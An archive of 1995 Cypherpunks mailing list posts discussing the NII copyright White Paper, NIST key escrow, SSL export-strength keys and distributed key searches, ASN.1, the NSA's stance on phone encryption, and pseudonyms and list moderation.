at a time :-)) From bal at martigny.ai.mit.edu Sun Sep 3 11:36:26 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Sun, 3 Sep 95 11:36:26 PDT Subject: Looking for NII IP "White Paper"... Message-ID: <9509031836.AA23248@toad.com> According to an article in Sunday's _Washington Post_ the final draft of the "Intellectual Property and the National Information Infrastructure" report is going to be released Tuesday morning. You may recall the premilinary draft of this report, a.k.a. the "Green Paper", and its proposed changes to U.S. Copyright Law. Does anyone on the list have a copy of the final draft/"White Paper"? The administration is evidently keeping it under pretty tight wraps, probably because of the intense criticism the Green Paper received. Personally, I expect the White Paper to be just as bad. --bal References: The Green Paper/Preliminary Draft is available at: http://www.uspto.gov/niiip.html Pam Samuelson's critique, which appeared in _Communications of the ACM_ and which you should definitely read, is available at: http://www-swiss.ai.mit.edu/6095/articles/samuelson-nii-cacm-dec94.html From pfarrell at isse.gmu.edu Sun Sep 3 11:39:09 1995 From: pfarrell at isse.gmu.edu (Pat Farrell) Date: Sun, 3 Sep 95 11:39:09 PDT Subject: WEB pointers for NIS&T Key Escrow meeting Message-ID: <9509031838.AA01294@isse.gmu.edu> To save list bandwidth, I've put the agenda, attendee list, and the three discussion topic papers for this week's Key Escrow meeting on my web. url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html I'll add anything else I get from NIS&T, and any pointers folks send my way. Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From Richard.Johnson at Colorado.EDU Sun Sep 3 12:26:51 1995 From: Richard.Johnson at Colorado.EDU (Richard Johnson) Date: Sun, 3 Sep 95 12:26:51 PDT Subject: Dumb Question: PGPfone over Appletalk Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Can someone tell me how to run PGPfone over Appletalk ? The >documentation says that support has been added for this release, and >there's a preferences box to check to use it, but there's no information >I can find in the documentation on how to initiate a call over >Appletalk.. it just says to enter a telephone number to dial. If I >press 'Connect' without entering anything it hangs up the Mac. > >How do I tell it which machine I want to connect to ? > > Mark "Don't know much about Macs" Grant My guess is that you're on a network with multiple AppleTalk zones. The "PGPfone 1.0b4 README" file mentions a known bug that causes PGPfone to freeze when trying to bring up its AppleTalk Browser. The Read Me file then goes on to explain how to connect anyway. Be sure to use a semi-colon, not a colon, between the zone name and the macintosh name... Richard -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEn+T/obez3wRbTBAQHG7gP+J8It6kZTRYhte2ffTSzflQB8ff14a2pR VR81PD0HIjE5cyNTrAlA6FdVGguy21BIK+tUz5rmQBRuZP46OWynBqk4y551M+fg JjnEOk2jXNBZDFdwT9fy5hWc3g38os6vto5/4vsj5Vhw0+6EoVojzJ8AU99ibG7z pKnPhQnpISI= =8lQJ -----END PGP SIGNATURE----- From hfinney at shell.portal.com Sun Sep 3 12:49:19 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 3 Sep 95 12:49:19 PDT Subject: SSLRef (SSLtelnet) Message-ID: <199509031948.MAA17974@jobe.shell.portal.com> The link I used recently to get SSLREF is . I don't now what kind of export restrictions this enforces. I was hoping to write a program which would sit on the user's PC and act as a proxy for Netscape's browser. It would connect using 128 bit SSL instead of 40 bit. The stumbling block is that Netscape won't connect to even the local proxy unless it sees a valid certificate, one signed by a CA that it accepts. For this application I would need such a certificate, and make the corresponding public and private keys public, hard-coding them into the proxy. Since the proxy runs on the same PC as the browser there is no need for confidentiality between them, and the secret key can be revealed. Does anyone have an idea for a way to acquire a certificate acceptable to Netscape, perhaps one with a "broken key", that could be used for this purpose? Hal From hallam at w3.org Sun Sep 3 12:52:12 1995 From: hallam at w3.org (hallam at w3.org) Date: Sun, 3 Sep 95 12:52:12 PDT Subject: ASN.1 and Kerberos version 5 In-Reply-To: Message-ID: <9509031951.AA23373@zorch.w3.org> I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it worked then ASN.1 would be very very usefull. But is just plain don't. ASN.1 is worse than useless, it means that a very good idea is rendered unusable because of a baddly botched implementation. The ambiguities of the ASN.1 spec are at least as bad as Jeff makes out. I have attempted to implement an ASN.1 compiler but I have little cofidence in its correctness because the structure of ASN.1 is so unweildy. It is not just ANY that causes problems, IMPLICIT is a complete cock up. ASN.1 is poor because it is unecessarily complex, has little intelectual coherence and has been extended in a manner which conflicts with the original design principle. Is it any coincidence that ASN.1 backwards is the name of a well known organisation? Also the only person who has defended ASN.1 to my face happened to work for that organisation once. So the motto is: ASN.1 - Just say NO! Phill From rsnyder at janet.advsys.com Sun Sep 3 13:17:32 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Sun, 3 Sep 95 13:17:32 PDT Subject: SSLRef (SSLtelnet) In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com> Message-ID: <199509032018.QAA03382@janet.advsys.com> hfinney at shell.portal.com said: > Does anyone have an idea for a way to acquire a certificate > acceptable to Netscape, perhaps one with a "broken key", that could > be used for this purpose? RSA will give out certificates to individuals; Apple includes a coupon for a free one with their MacOS 7.5 (and 7 Pro) release. There's a program for the Mac (RIPEM Mac) that will convert the keys returned into RIPEM usable PEM-format keys. Isn't that what SSL uses? The only question is what CAs are supported by the browser.... I think the Apple keys are under RSA's Unaffiliated User CA... If there's interest, I'll look further into this. Bob From ylo at cs.hut.fi Sun Sep 3 13:32:00 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Sun, 3 Sep 95 13:32:00 PDT Subject: SSLRef (SSLtelnet) In-Reply-To: <199509030845.CAA00124@wero.byu.edu> Message-ID: <199509032031.XAA22330@shadows.cs.hut.fi> > URL: http://home.netscape.com/info/sslref.html > If anyone knows of any clones or foreign sources please speak up. SSLeay (Eric Young's free SSL implementation from Australia) is available from ftp.psy.uq.oz.au:/pub/Crypto/SSL. For information on other cryptographic software available outside the United States, see http://www.cs.hut.fi/crypto. Tatu From shamrock at netcom.com Sun Sep 3 14:35:50 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 3 Sep 95 14:35:50 PDT Subject: NIST attendee list Message-ID: The dangers of public attendee lists. Some Cypherpunk might match the list against east cost lawyers and break Black Unicorn's nym. -- Lucky Green PGP encrypted mail preferred. From unicorn at access.digex.net Sun Sep 3 14:40:59 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Sun, 3 Sep 95 14:40:59 PDT Subject: NIST attendee list In-Reply-To: Message-ID: On Sun, 3 Sep 1995, Lucky Green wrote: > Date: Sun, 3 Sep 1995 14:39:38 -0800 > From: Lucky Green > To: cypherpunks at toad.com > Subject: NIST attendee list > > The dangers of public attendee lists. Some Cypherpunk might match the list > against east cost lawyers and break Black Unicorn's nym. > Luckily I've accounted for this. > > -- Lucky Green > PGP encrypted mail preferred. > > > 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From Tim at alia1.demon.co.uk Sun Sep 3 15:15:52 1995 From: Tim at alia1.demon.co.uk (Tim Magee) Date: Sun, 3 Sep 95 15:15:52 PDT Subject: anyone know what this "top secret" code does? Message-ID: <150@alia1.demon.co.uk> In your message dated Saturday 2, September 1995 : > Does anyone remember the scenario someone suggested awhile back that > hypothesized a scheme by the NSA or other TLAs to encourage the use > of WEAK crypto? It involved spreading a lot of F.U.D. about PGP and > other strong crypto methods, followed by the discovery/leak of a > supposedly "strong" crypto algorithm to replace it. If the YFTLA could diffuse actual source of a method *supposedly* stronger than IDEA and get away with it, could they not equally qell get away with planting their man Zimmermann and having him publish PGP with a cunning trapdoor? Let's see, to lend cred to that though they'd probably have to have him arrested on trumped-up charges and generally harassed ... Many people only THINK they know what cynicism means. Seriously: I've not been round long enough to have a good idea how likely my proposed scenario is. You can all probably tell me things about Z's provenance which blow my little theory sky-high. cheers, tim M. -- "Man is born free, and everywhere he is very reasonable." -- Rousseau (roughly) Tim Magee, e-mail: Tim at alia1.demon.co.uk, tel: +44-1225-316785 From jsw at neon.netscape.com Sun Sep 3 15:20:24 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sun, 3 Sep 95 15:20:24 PDT Subject: A bold ssl idea ? In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au> Message-ID: <42d9lh$mjf@tera.mcom.com> In article <199509031145.VAA12843 at oznet02.ozemail.com.au>, lyalc at ozemail.com.au (lyal collins) writes: > Having watched the discussions of recent of the SSL bruting, it occured to > me that a variation could also be useful. > I understand that setting up RC4 keys is slower that testing for the correct > key (I may have misuderstood this bit). > As a company using SSL can ahve all it's SSL traffic sniffed, from multiple > people accessing, a log can easily be built of message/keys. > Is it considered practical to modify the brutessl code to have multiple > message data, and test each against a key from allocated key space ? > If so, this may mean that perhaps 3 message can be tested against a single > in the time two single keys could be tested against one message. > An an attack scenario, this is a hell of a lot more "efficient" than current > trials have been. I realise this could also be considered a bit of target > for the main purpose of demonstrating weaknesses, and improving techiquess. This technique has been discussed before. It will not work because the 40-bit export version of SSL actually uses 128 bit keys, with 88 of the bits transfered in the clear. The extra 88-bits act as a "salt" to the key. This defeats attempts to do a single key space search for multiple messages. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rrothenb at ic.sunysb.edu Sun Sep 3 15:41:09 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Sun, 3 Sep 95 15:41:09 PDT Subject: LR/SHS src (386 ASM) Message-ID: <199509032235.SAA03213@csws5.ic.sunysb.edu> I have uploaded a copy of lrsha14.zip to the cypherpunks ftp site. It contains source code for a 32-bit implementation of the Secure Hash Algorithm as well as a Luby-Rackoff/SHA cipher in CFB mode, and a sample Turbo Pascal interface for debugging it, etc. -Rob From futplex at pseudonym.com Sun Sep 3 17:35:43 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 3 Sep 95 17:35:43 PDT Subject: Joel's RSA-t's In-Reply-To: Message-ID: <9509040035.AA28573@cs.umass.edu> Mike writes [re: Perl-RSA T-shirts]: > I just have one problem though... If these things are classified > as a "munition" aka a "weapon" by da fed's how does that affect us down > here in good old Georgia where our legislature has passed a law making > it a crime to be in posession of a weapon anywhere within a hundred yards > or so of school property. Strong crypto is considered to be a munition *for purposes of U.S. export controls*. With respect to possession within the U.S., there aren't any laws stopping you from waving strong cryptography around wherever you like (at least, not yet). -Futplex From vznuri at netcom.com Sun Sep 3 17:55:13 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sun, 3 Sep 95 17:55:13 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509030434.VAA24841@mycroft.rand.org> Message-ID: <199509040052.RAA25910@netcom10.netcom.com> jim at acm.org: >- By the middle to late 1960's cryptanalysis became less cost effective > than obtaining the information by other means -- wiretaps and so on. but for some reason, the NSA keeps humming along...? perhaps confirming the rule that bureacracies, like bores at parties, persist long after they are relevant? >In the future there will be more radio used for ordinary communications. >Americans are unwilling to pay for secure telephones, but that's not the >case in Europe. I object to this highly. the NSA has very little credible understanding of market forces, IMHO. they are a government agency. they do not understand marketing or human psychology. Clipper, the closest the agency has come to creeping out of the darkness of their coffin, was a total fiasco. the self-destructing director of NSA whats-his-name who as running for that FBI position or whatever is another example of how the inbred spook society has difficulty dealing with anything outside their artificial reality. as for the market viability of cryptographic phones, I think this is duplicity ranging on utter lying that "the US public is not willing to pay for secure phones". this is precisely the baseless rumor and conventional wisdom one would expect the NSA attempt to spread and use to surreptitiously manipulate the natural market direction. every phone company would avoid even introducing a phone model because "after all the public is not willing to pay for encryption". sure, maybe they won't pay for the very finest encryption money can buy, but they can get some pretty awesome bang for minor bucks when it comes to crypto. the fact is, cryptography is becoming EXTREMELY CHEAP. virtually all phones are going to have some high power microprocessor inside that could be used to do semi-decent secure encryption, far better than *nothing*, the current status quo-- *for free*, virtually, because the phone is already going to have some serious horsepower. the whole issue of "signal transformation" is very intrinsic to the existing phone circuitry anyway. extremely secure encryption (i.e. that the NSA is not likely to break at all) is another issue, but again chips are becoming awfully cheap. so I say anyone spreading a rumor that "american public doesn't want encryption or is not willing to pay for it" (esp. in cell phones or whatever) is either: 1. intentionally lying 2. rather clueless 3. making an unwarranted and undemonstrated assumption 4. possibly has an axe to grind-- i.e. axeing widespread public encryption furthermore, the idea that someone from NSA would say something like "the U.S. public doesn't want so-and-so" encryption I find highly repulsive. the NSA's business is based on SUPPRESSING ENCRYPTION. it would be hard to find a more biased and less credible opinion anywhere. the NSA has done the very best job of sabotaging the natural growth of cyberspace by having its slithering tentacles lodged into key areas of influence within our government, while at the same time pretending that it is actually working in our own best interest. -- frankly, I think any anti-encryption sentiment is inherently unpatriotic. you see, there is far more to be gained from widespread encryption than is to be lost from it. the NSA in their anal retentive, freedom-pissing mode will never understand this, or never apprise the situation unbiasedly, but it appears to me to be fairly unequivocal that there are tremendous benefits from the availability of widespread, seamless, invisible encryption. if the NSA released one public report that analyzed the actual cost benefit ratio to *society* of free encryption, that is the day I will scrape a smidgeon of respect for this vile, odious, noxious excuse for a publicly funded institution. but the NSA will never do this, because (1) the NSA can barely stand to address the congress honestly and openly, and virtually never does even this, and so the idea of justifying its existence to the actual public that pays for its spook toys is beyond distasteful to the agency, it would be sacrilegious!! (2) they are incapable of an unbiased opinion on the issue, in fact they are probably not even capable of any opinion that is not duplicitous and inherently self-serving beneath a surface sugar-coating of actual legitimacy, (3) they don't want to admit that their main motive, their raison d'etre, has absolutely nothing to do with maximizing overall public welfare-- it has to do with maximizing their own budget and maximizing intelligence available to their omnipresent tentacles. but thanks, JG, for a look into the dark, squirmy, teeming recesses of some perverted spook's mind. I would thoroughly enjoy any other choice morsels you have to offer about the lies that spooks tell each other to justify their existence. and the ones that they actually believe are by far the most entertaining! --Vlad Nuri From unicorn at access.digex.net Sun Sep 3 18:19:37 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Sun, 3 Sep 95 18:19:37 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com> Message-ID: On Sun, 3 Sep 1995, Vladimir Z. Nuri wrote: > was a total fiasco. the self-destructing director of NSA whats-his-name > who as running for that FBI position or whatever is another example of how > the inbred spook society has difficulty dealing with anything outside > their artificial reality. Give this man a prize. --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From jirib at sweeney.cs.monash.edu.au Sun Sep 3 18:33:40 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Sun, 3 Sep 95 18:33:40 PDT Subject: SSL search attacks In-Reply-To: <9508311728.AA16306@ozymandias.austin.ibm.com> Message-ID: <199509040132.LAA21977@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello cypherpunks at toad.com and Scott Brickner Scott Brickner writes: > Jiri Baum writes ... > >Each client could pick a segment at random, check it and then broadcast > >a NAK. Other clients would then know that the segment in question has ... > This only reduces the cost if everyone is playing fair. In practice, ... No worse than fake NAKs to the central server (viz comment below). > >One advantage is that it is not necessary to have a central infinitely > >trusted server. (Nothing personal, but bogus server is an attack.) > > An attack on what? The overall model here is that someone presents ... An attack on the attempt. If the key owner also volunteers a server, then half the CPU cycles will report to that server (and be given useless chunks of keyspace) thus halving the CPU power available to the usual server ("half" in an infinitely naive world, of course). The approach I suggested basically corresponds to everyone maintaining hir own server; servers that trust each other will coordinate. An attacker can of course NAK the key segment, but only those that trust the attacker will take any notice. > My point is that the "random" efforts are no different than everyone > working on the problem independently, each picking a random place to > start and going sequentially from there. The difference is that in this scheme everyone does coordinate, only it's peer-peer rather than client-server. > >NAKs and IGRABs would be weighted by the trust accorded to the entity > >that originated them. > > This is similar to what I outlined yesterday afternoon. Let unsolicited ... I think that's where it came from. I really should provide citations, shouldn't I... ... > Invalid unsolicited NAKs > don't destroy the current search, they only slow it down slightly --- > but less than a fully random effort. Similarly in the peer-peer approach, the effort is coordinated but untrusted NAKs slow it down only slightly. The only "solicited" NAKs will be your own. Hope that makes sense... Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMEpXLSxV6mvvBgf5AQFn2QP/eJ0BlATPHS2xoLoJuHdJYR7Y5gN5scmK DHOby7rGJ3Rj6CZ6PrdkQVf9ckUdmUwhCzAiCi3wnPHPf0gi4rPjLyBpmyTgl8yA q+VqYPkBAflwHqXIsqbxx94PiZayt8b578Qtqoa2jJzjSCKMa8IonWGeztP/xNxa FCmJDocudq4= =r/Hv -----END PGP SIGNATURE----- From vznuri at netcom.com Sun Sep 3 18:33:54 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sun, 3 Sep 95 18:33:54 PDT Subject: pseudonyms & list health Message-ID: <199509040131.SAA29509@netcom10.netcom.com> P.M. remarked in exasperation a little while ago that he thought that some of the best minds had been lost in list attrition due to high traffic, naming some people who had seemingly dropped from the list (Bill Stewart? Phil Karn?) but what if these people had just stopped subscribing under their clear name? and started using a pseudonym? this brings to light the idea that credibility is hard won, and that it is hard to get, and that people need all the credibility that they can achieve. it seems that virtually all accomplishments are credibility-enhancing, and people only "notch down" their reputation estimations in extreme circumstances. hence, what I am suggesting is that one of the "stable attractors" that TM is always talking about may be a reality in which people pool most of their accomplishments under a single nym. furthermore, they will wish to avoid conflict with other nyms in respect to attribution. isn't this, functionally, the equivalent of the supposed anti-cypherpunk "true names"? now, I'm not suggesting that "if you want to do something in secret, you must have something to hide". (although that seems almost like a tautology to me). but what I am suggesting, is that if you want to get credit, it may pay to pool all your accomplishments under one nym (tracing it to a physical body is a whole separate issue-- the two should not be confused; although the concept of "true names" does tend to blur this distinction). in the case of PM, he thought that because some people ostensibly dropped from the list, the list quality had decreased. but he seemed to be making this conclusion based on their "real identity". what if they were still around, posting under pseudonyms? would he be able to tell? would the signal quality be the same? the point is that people seem to judge list quality based on criteria in which "true names" play a major role. I'm not saying this is the only way to do it, but I am saying that "true names" seem to be very much ingrained into human psychology, particularly in public forums and attributing credit, and the idea that they are wholly irrelevant to most human endeavor is very suspicious, at least deserving more than a few paragraphs of supposed proof. -- another problem with pseudonyms and list noise is the following. first, let me start by saying I think this list approaches the "dysfunctional" level at times when everyone is ranting about each other about staying on topic. there is an awful lot of hostility on this list. maybe people like it, I'm not sure. I'm interested in the sources of this hostility, though, and I think I can identify some good candidates. the list hostility and tension is quite palpable. when TM prefaces many of his posts, and many others do, with frequent apologies about being on topic, I am amazed to see this because I don't see people so self-conscious on other mailing lists. in my opinion, this is where the role of the moderator is absolutely critical. any mailing list with an AWOL moderator is only asking for total chaos, IMHO. in this case I'll use the word "moderator" and "list creator" interchangeably. the best recommendation to everyone who subscribes to the list, and to the moderator, is that THE MODERATOR DETERMINES WHAT IS RELEVANT. that means that no one else has the authority to do this, NO ONE. if you find a post that bothers you, FIRST WRITE THE LIST MODERATOR. ask the LIST MODERATOR to deal with the offending poster. the list moderator should make a judgement when the list is in a "noise" phase and try to be clear about what is relevant to the list and what is not. what this requires is a watchful eye and regular interventions, IMHO. a list where the moderator is never around may seem like a haven, but in my opinion it only turns into a grouch free-for-all subject to regular conflagrations that leave everyone *really* pissed off, as did a recent eruption by TM and PM. now, whenever you see someone write, THIS ISN'T RELEVANT TO THIS LIST!! THIS DOESN'T HAVE ANYTHING TO DO WITH CRYPTO!! IMHO you should gently remind this person in email that THEIR OPINION OF WHAT IS RELEVANT OR NOT IS NOT RELEVANT. tell them to write the list moderator first, IN EMAIL. jamming up the communication medium with meta traffic about what is an is not relevant is absolutely futile and useless and counterproductive and extremely anxiety producing. so, as you can see, IMHO people who are continually making judgements about what is or is not relevant to the list, and posting those opinions, are PART OF THE PROBLEM. (I am reminded of one himself talking about people who are part of the problem and who is part of the solution. well, IMHO, ironically, he is PART OF THE PROBLEM, and for a very obvious and clear reason that even an intelligent child could grasp). -- the Yin to the Yang of all this, however, is that the LIST MODERATOR MUST OCCASIONALLY SHOW HIS FACE and make unambiguous rulings about what is and what is not appropriate, especially when the noise level increases and people start to wonder. the problem with this is a list moderator who likes to use one or two pseudonyms. the pseudonyms may be so secret that not *anyone* on the list is aware of his identity, even close friends. this list moderator may be loathe to ever post under his "true name" or whatever name he used to start the list. anyway, you can see that this whole business of pseudonyms, while perhaps workable, is certainly fraught with pitfalls IMHO. at least in situations of *public forums*, I am going to go out on a limb and say that it is very troublesome. it seems that in any forum, there are people who will try to disrupt the proceedings so to speak. in real life you can throw them out, by identifying their *picture*. in a cyberspace that lacks true identities, you cannot throw out these "problem people". they continually come back to haunt you despite your best attempts to bar them. doesn't that bug you? doesn't that irritate you? doesn't that drive you crazy? or do you like the idea that the person you most hate in life might be posting behind any of the next few messages? and there's nothing you can do about it? because you in fact embrace the capabilities that let him do this, and you're pretty sure you're not a hypocrite? well, just some musings for those who unabashadly promote pseudonyms to contemplate. p.s. in regard to the above, about "people other than the moderator posting judgements about what is and is not relevant to the list", I am not making a judgement about what is and is not relevant on the list. I am making a judgement about making a judgement about what is and what is not relevant on the list. --Vlad Nuri From jim at acm.org Sun Sep 3 18:40:08 1995 From: jim at acm.org (Jim Gillogly) Date: Sun, 3 Sep 95 18:40:08 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com> Message-ID: <199509040139.SAA26859@mycroft.rand.org> > jim at acm.org (reporting on R. H. Morris' talk at Crypto '95): > >- By the middle to late 1960's cryptanalysis became less cost effective > > than obtaining the information by other means -- wiretaps and so on. > "Vladimir Z. Nuri" writes: > but for some reason, the NSA keeps humming along...? perhaps > confirming the rule that bureacracies, like bores at parties, > persist long after they are relevant? Evidently they have plenty of other sources to deal with... their SIGINT charter is to read traffic, not necessarily to decrypt traffic. It does seem excessive, though, and it will seem even more excessive once more traffic is encrypted with strong systems and plaintext begins to disappear from the airwaves and wires. It bothers me that the gov't appears to be redefining the role of the intelligence community to be economic spying rather than the military spying that was (I think) justified during the Cold War. Rather than finding ways to justify and maintain current budgets and bureaucracies, why not just cough up the peace dividend? > >In the future there will be more radio used for ordinary communications. > >Americans are unwilling to pay for secure telephones, but that's not the > >case in Europe. > I object to this highly. the NSA has very little credible understanding > of market forces, IMHO. they are a government agency. they do not ... > as for the market viability of cryptographic phones, I think this > is duplicity ranging on utter lying that "the US public is not > willing to pay for secure phones". this is precisely the baseless I misstated his point to some extent here. He was contrasting current buying practices in the U.S. and in Europe, not predicting the future (i.e. not exactly what I said above). In particular, he mentioned GSM in Europe and its success... of course, that doesn't count as strong encryption with the keys evidently being no better than 40 bits worth, but it's a lot better than calling in the clear from your cellular phone. He indicated that Europe has embraced GSM and the US has not (yet) embraced anything equivalent (about which more below). > Clipper, the closest the > agency has come to creeping out of the darkness of their coffin, > was a total fiasco. Clipper wasn't a fiasco from the gov't's point of view if you look at what it prevented rather than what it achieved. By now the DES-based AT&T encryption box might be the US standard if the Gov't hadn't intervened by "incentivizing" them around the time of the Clipper roll-out. It was ready to go and was already in production when Clipper got rushed up. As it is there is now no standard and most traffic is still in clear. If this doesn't reflect a credible and understanding of how the market works, what would? Of course this one can't completely be laid at NSA's door, but it's convenient to think of them as the fount of US crypto policy decisions. > you see, there is far more to be gained from widespread > encryption than is to be lost from it. Agreed. Jim Gillogly Trewesday, 13 Halimath S.R. 1995, 01:26 From vznuri at netcom.com Sun Sep 3 18:52:47 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sun, 3 Sep 95 18:52:47 PDT Subject: maximizing cryptographic return Message-ID: <199509040149.SAA01359@netcom10.netcom.com> the question of the cost-effectiveness of phone encryption was raised by my other message. I would like to question how cheaply good encryption could be done on phones, with a poor quality microprocessor. most on this list are aware of the idea that good encryption is often used to send a low-bandwidth session key, which is then used to encrypt that session using a less sophisticated but less computationally-demanding algorithm. hence you seem to have good security at a computational price that is less than encrypting everything with the secure protocol. I was wondering how secure the following algorithm would be for phone calls: suppose that at the beginning of each session, the random key is traded using RSA or some other very secure approach. the key is a *random bit width*, say 100-6000 bits. now, my question is, I wonder if some very cheap algorithms, in terms of computation time, could be used for the "on the fly" encryption of the voice using those bit. would XOR with the pad be totally out of line? the situation is such that trivial algorithms such as XOR with *unlimited cyphertext* can be broken quite trivially. but it seems to me this dogma that "XOR is WEAK" is based on the premise that you have a huge amount of cyphertext to play with. take away this premise, that you have a session key that is guaranteed to really give you very little cyphertext, do these supposedly "weak" algorithms then become pretty secure? what I am getting at is that it seems there is this frequent assumption that "good cryptography for on-the-fly encryption means you need huge computational bandwidth". I wonder how true this really is. can you have a situation where you spend a lot of time computationally negotiating the *random one time pad*, but then have a fairly weak algorithm doing the on-the-fly encryption with the random pad? IMHO this would be the holy grail for phone hardware. as I wrote, you are already going to have something approximating the power of a low- bandwidth microprocessor in a phone. now imagine it took a long time to send the key at the beginning, but that once traded it was no big deal-- real time communication using even "weak" algorithms. what I am suggesting here is that we can get encryption for almost *no additional cost* over existing phone hardware. and I am suggesting that the main hurdles to encryption are political, not technical. again, I wonder if "weak" encryption schemes are really that weak if they are only used on short cyphertexts and if you have a good, secure OTP (one time pad). I think it may be a delusion that you must have a huge amount of computational bandwidth or have to encrypt every bit using state-of-the-art, computationally-demanding algorithms to have extremely secure on-the-fly communications. p.s. can someone give a brief summary of the Nautilus and PGP session key / code frameworks? p.p.s. a few footnotes in regard to the previous article. widespread, seamless phone encryption is the NSA's absolute worse nightmare. everything they are doing to prevent cryptography can be thought of as trying to avoid this particular reality configuration. pay special attention how they approach the issue and it will tell you what they fear the most, and what they are trying to do to prevent it. also, Bob Morris said in his talk, acc. to Gillogly, that Europeans *were* willing to pay for encryption in their phones, but those in the US weren't. please expand on that little nugget!! how did you come to that conclusion? why are americans fundamentally different than europeans in regard to the value of encryption? if humans want the same thing in most markets (as the situation of international product marketing generally seems to suggest) does it make you think that something besides the desirability of crypto is at stake here in the localities, such as *politics*? --Vlad Nuri From alanh at infi.net Sun Sep 3 19:03:26 1995 From: alanh at infi.net (Alan Horowitz) Date: Sun, 3 Sep 95 19:03:26 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509040139.SAA26859@mycroft.rand.org> Message-ID: "Just cough up the peace dividend". There is no ppeace dividend. There is a massive eco-spill of government debt; quite possibly larger than the GNP capacity of the American economy to repay anytime in the next century. The debt will be bankrupted, in some stealthy manner, hidden by masses of smoke and mirrors. Nothing new here - it's about the only thing that works. For the mosrt recent examples, read up on FDR's confiscation of gold in (?) 1933. Or read the detrails of the currency changeover effected by the occupation authorities in Germany (1947 or 1948). Alan Horowitz alanh at infi.net From vznuri at netcom.com Sun Sep 3 19:15:32 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sun, 3 Sep 95 19:15:32 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509040139.SAA26859@mycroft.rand.org> Message-ID: <199509040212.TAA03591@netcom10.netcom.com> JG: >Rather than finding ways to justify and maintain current budgets >and bureaucracies, why not just cough up the peace dividend? taking money from a bureacracy is like the exact opposite of taking candy from a baby. but hell, maybe you could get a job as a spook in their dark tunnels and "show them the light" so to speak. >I misstated his point to some extent here. oh right, any perceived boneheadness on the part of a premiere spook is surely in the eye of the beholder > He indicated >that Europe has embraced GSM and the US has not (yet) embraced anything >equivalent (about which more below). well, thanks for clearing up the assertion but I stand by my rant. (and BTW, thank you for the wonderful opportunity, one must prize every opportunity to get one's blood boiling to know one is alive). the US may very well not have "embraced" any encryption standard because the NSA is trying to THROW A @#$%^&* WRENCH INTO ANY STANDARD THAT IS DEVELOPED. that is EXACTLY WHAT CLIPPER WAS AN ATTEMPT TO DO. y'know that we MAY HAVE WIDESPREAD ENCRYPTION BY NOW if the NSA has not continually interefered with what is normally a NATURAL PROCESS of standards creation in the technological community. Clipper is a black, black mark not only because of what it tried to *introduce*, but also of what it tried to *replace*. again, the fact that we do not have widespread encryption in the U.S. acc. to the NSA reminds me of the anecdote of the murderer going before the court and stating that he deserved leniency because he was an orphan. THE NSA HAS TRIED TO MURDER CRYPTO IN THE U.S. and then say, "gosh!! there's no crypto!! no one has it!! therefore, no one wants it!! why is everyone so angry when we tried to keep it from everyone when nobody wants it"? @#$%^&*!!! again, I suggest that the lack of crypto in the US is due to a *political* situation, and nothing else. the NSA of course would like to deny that, and justify the *political* situation based on something else (such as that people don't really want encryption or that it is not really in the nation's best interests) >Clipper wasn't a fiasco from the gov't's point of view if you look at what >it prevented rather than what it achieved. By now the DES-based AT&T >encryption box might be the US standard if the Gov't hadn't intervened by >"incentivizing" them around the time of the Clipper roll-out. exactly. THE MARKET COULD HAVE BEEN MATURING LONG AGO INSTEAD OF THROWN INTO CONFUSION. we could have been on the path to improving encryption capability. and Clipper is only the product that we *saw* in front of the world. did anything in the Clipper announcement talk about the government collusion with AT&T? it is patently obvious that the NSA has long worked behind the scenes to try to sabotage crypto, and that Clipper was only the most desperate instance that we *heard* about. of course, when there is widespread crypto the NSA will probably try to justify its existence based on the widespread crypto in the world, and take credit for its introduction. "why, after all, Clipper was a major step in introducing good encryption to the masses". @#$%^&* > It was >rady to go and was already in production when Clipper got rushed up. As >it is there is now no standard and most traffic is still in clear. indeed!! true progress!! the government has accomplished its mission of sabotaging privacy!! so Clipper is a tremendous success in sowing fear of the NSA into every American!! in throwing the standards process into total confusion!! JG, let me ask you a question. imagine there was some foreign government agency, say of a totalitarian government, that wanted to prevent the "spread 